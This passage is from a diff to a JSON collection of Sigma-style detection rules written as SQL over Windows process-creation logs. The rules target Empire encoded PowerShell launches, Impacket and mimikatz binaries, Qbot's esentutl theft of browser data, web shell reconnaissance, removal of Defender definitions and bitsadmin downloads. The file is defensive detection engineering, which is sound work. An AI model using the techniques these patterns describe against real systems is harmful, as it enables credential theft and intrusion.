'%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_regsvr32_anomalies.yml" + }, + { + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218.007", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", "attack.execution", - "attack.t1059.003" + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "status": "test", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.privilege_escalation", "attack.discovery", - "attack.t1033" + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.defense_evasion" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE 